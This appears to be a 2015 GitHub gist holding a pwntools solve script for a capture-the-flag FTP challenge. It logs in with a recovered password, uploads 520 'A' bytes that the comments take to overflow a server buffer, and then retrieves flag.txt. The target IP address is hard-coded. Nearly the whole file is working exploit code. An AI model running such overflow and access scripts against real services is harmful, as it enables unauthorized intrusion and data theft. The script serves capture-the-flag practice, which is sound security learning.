
@lassimus lassimus/sol_ftp2.py
Last active Sep 24, 2015

#!/usr/bin/python
from pwn import *
from Crypto import Random
import time
# Flat pwntools script that drives an FTP-like service end to end: log in on
# the control connection, upload a 520-byte file over one passive-mode data
# connection, then request flag.txt over a second one and log what comes back.
# NOTE(review): the server's code is not on this page, so the reason the
# upload makes the later RETR succeed is not established here -- presumably
# the 520-byte body overruns a fixed-size server-side buffer; confirm against
# the service source. If so, the fix belongs in the server: bound the STOR
# data it copies.
# The target host is hard-coded; the commented-out line is the local variant.
# dst = "localhost"
dst = "54.175.183.202"
# Control connection (commands and replies) on port 12012.
s = remote(dst, "12012")
# Python 2 only: str.decode('hex') turns the hex string into raw bytes.
pw = "0e42011f121d05".decode('hex') #valid pw from solving ftp1
# Fixed one-second pauses around the login commands; presumably they give the
# server time to emit its prompts -- nothing is read back until recvuntil below.
time.sleep(1)
s.send("USER blankwall\n")
time.sleep(1)
# Unlike every other command here, PASS is sent without a trailing "\n" and
# the decoded password does not end in one either.
s.send('PASS ' + pw)
# Block until the server confirms the login, and log everything received.
log.info(s.recvuntil("logged in\n"))
# Ask for a passive-mode data port and parse it out of the reply text.
s.send("PASV\n")
s.recvuntil("on port: ")
# NOTE(review): reads at most 5 bytes and uses them as the port unvalidated,
# so this assumes the server always announces a five-digit port.
port = s.recv(5)
# STOR goes out on the control connection before the data connection is opened.
s.send('STOR {}\n'.format("tacos"))
sender = remote(dst, port)
log.info("Storing on port: {}".format(port))
# The file body is 520 'A' bytes; closing the data connection ends the upload.
sender.send('A'*520)
sender.close()
# Second passive-mode exchange, parsed the same way as the first.
s.send("PASV\n")
s.recvuntil("on port: ")
port = s.recv(5)
log.info(port)
# Here the data connection is opened first and RETR is sent afterwards.
sender = remote(dst, port)
s.send("RETR flag.txt\n")
# Log at most 37 bytes from the data connection (presumably the flag length).
log.info(sender.recv(37))
sender.close()
# Hand the still-open control connection over to the operator's terminal.
s.interactive()